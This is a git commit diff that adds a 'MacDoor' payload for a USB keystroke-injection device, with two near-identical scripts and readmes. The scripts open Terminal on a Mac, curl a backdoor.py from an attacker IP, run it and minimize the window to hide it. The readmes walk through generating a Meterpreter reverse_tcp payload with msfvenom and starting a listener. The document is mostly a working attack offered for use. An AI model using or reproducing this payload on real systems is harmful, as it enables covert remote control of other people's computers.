Create MacDoor - A Python Backdoor for MacOS (#662)
* Add files via upload * Update readme.md * Add files via upload * Update readme.md * Update payload.txtpull/663/merge
parent
856579039a
commit
5ec93761fd
|
@ -0,0 +1,47 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacDoor
|
||||
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||
# Author: afsh4ck
|
||||
# Version: 1.0
|
||||
# Target: MacOS
|
||||
# Category: Execution
|
||||
#
|
||||
# Steps:
|
||||
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||
# Step 2: mount a local server 'python3 -m http.server'
|
||||
# Step 3: msfconsole multi/handler listener open before the attack.
|
||||
#
|
||||
# Note:
|
||||
# You need to modify the script with your attacker IP and the port or your local server.
|
||||
#
|
||||
# Purple.............Setup
|
||||
# Yellow blink.......Attack Mode ON
|
||||
# Green..............Finish
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||
LED ATTACK
|
||||
|
||||
# Open terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 500
|
||||
QUACK STRING Terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
|
||||
# Execute attack
|
||||
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING cd Downloads
|
||||
QUACK ENTER
|
||||
QUACK STRING python3 backdoor.py
|
||||
QUACK ENTER
|
||||
|
||||
# Minimize terminal
|
||||
QUACK GUI m
|
||||
QUACK DELAY 2000
|
||||
|
||||
# Standby
|
||||
LED FINISH
|
|
@ -0,0 +1,30 @@
|
|||
# MacDoor - Python Backdoor Execution for the BashBunny
|
||||
|
||||
```
|
||||
__ ___ ____
|
||||
/ |/ /____ _ _____ / __ \ ____ ____ _____
|
||||
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
|
||||
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
|
||||
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
|
||||
```
|
||||
|
||||
* Author: afsh4ck
|
||||
* Version: 1.0
|
||||
* Target: MacOS
|
||||
* Tested on: Ventura 13.3.1
|
||||
* Category: Execution
|
||||
|
||||
# DESCRIPTION
|
||||
|
||||
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||
|
||||
# STEPS
|
||||
|
||||
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||
* Step 2: mount a local server 'python3 -m http.server'
|
||||
* Step 3: msfconsole multi/handler listener open before the attack.
|
||||
|
||||
# NOTE
|
||||
|
||||
* You need to modify the script with your attacker IP and the port or your local server.
|
||||
|
|
@ -0,0 +1,47 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacDoor
|
||||
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||
# Author: afsh4ck
|
||||
# Version: 1.0
|
||||
# Target: MacOS
|
||||
# Category: Remote Access
|
||||
#
|
||||
# Steps:
|
||||
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||
# Step 2: mount a local server 'python3 -m http.server'
|
||||
# Step 3: msfconsole multi/handler listener open before the attack.
|
||||
#
|
||||
# Note:
|
||||
# You need to modify the script with your attacker IP and the port or your local server.
|
||||
#
|
||||
# Purple.............Setup
|
||||
# Yellow blink.......Attack Mode ON
|
||||
# Green..............Finish
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||
LED ATTACK
|
||||
|
||||
# Open terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 500
|
||||
QUACK STRING Terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
|
||||
# Execute attack
|
||||
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING cd Downloads
|
||||
QUACK ENTER
|
||||
QUACK STRING python3 backdoor.py
|
||||
QUACK ENTER
|
||||
|
||||
# Minimize terminal
|
||||
QUACK GUI m
|
||||
QUACK DELAY 2000
|
||||
|
||||
# Standby
|
||||
LED FINISH
|
|
@ -0,0 +1,30 @@
|
|||
# MacDoor - Python Backdoor Execution for MacOS
|
||||
|
||||
```
|
||||
__ ___ ____
|
||||
/ |/ /____ _ _____ / __ \ ____ ____ _____
|
||||
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
|
||||
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
|
||||
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
|
||||
```
|
||||
|
||||
* Author: afsh4ck
|
||||
* Version: 1.0
|
||||
* Target: MacOS
|
||||
* Tested on: Ventura 13.3.1
|
||||
* Category: Remote Access
|
||||
|
||||
# DESCRIPTION
|
||||
|
||||
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||
|
||||
# STEPS
|
||||
|
||||
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||
* Step 2: mount a local server 'python3 -m http.server'
|
||||
* Step 3: msfconsole multi/handler listener open before the attack.
|
||||
|
||||
# NOTE
|
||||
|
||||
* You need to modify the script with your attacker IP and the port or your local server.
|
||||
|
Loading…
Reference in New Issue